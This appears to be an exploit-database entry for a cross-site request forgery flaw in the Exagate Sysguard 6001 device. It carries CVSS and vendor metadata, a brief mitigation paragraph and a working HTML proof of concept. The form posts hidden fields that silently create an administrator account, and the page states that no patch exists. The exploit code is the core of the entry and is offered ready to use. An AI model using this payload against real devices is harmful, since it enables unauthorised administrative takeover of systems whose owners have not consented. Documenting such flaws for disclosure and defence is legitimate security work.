header-logo
Suggest Exploit
vendor:
Sysguard 6001
by:
Metin Yunus Kandemir
5.5
CVSS
MEDIUM
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: Sysguard 6001
Affected Version From: SYSGuard 6001
Affected Version To: SYSGuard 6001
Patch Exists: NO
Related CWE:
CPE: a:exagate:sysguard_6001
Metasploit:
Other Scripts:
Platforms Tested:
2021

Exagate Sysguard 6001 – Cross-Site Request Forgery (Add Admin)

This exploit allows an attacker to perform a Cross-Site Request Forgery (CSRF) attack on Exagate Sysguard 6001. By tricking a user into visiting a malicious website, the attacker can add an admin account without the user's knowledge or consent.

Mitigation:

To mitigate this vulnerability, Exagate should implement measures such as using anti-CSRF tokens or implementing strict referer policies to prevent CSRF attacks. Users should also be cautious when clicking on links or visiting unfamiliar websites.
Source

Exploit-DB raw data:

# Exploit Title: Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.exagate.com/
# Software Link: https://www.exagate.com/sysguard-6001
# Version: SYSGuard 6001

HTML CSRF PoC :

<html>
  <body>
    <form action="http://target/kulyon.php" method="POST">
      <input type="hidden" name="username" value="joke" />
      <input type="hidden" name="password" value="159384" />
      <input type="hidden" name="privilege" value="0" />
      <input type="hidden" name="button" value="Ekle" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>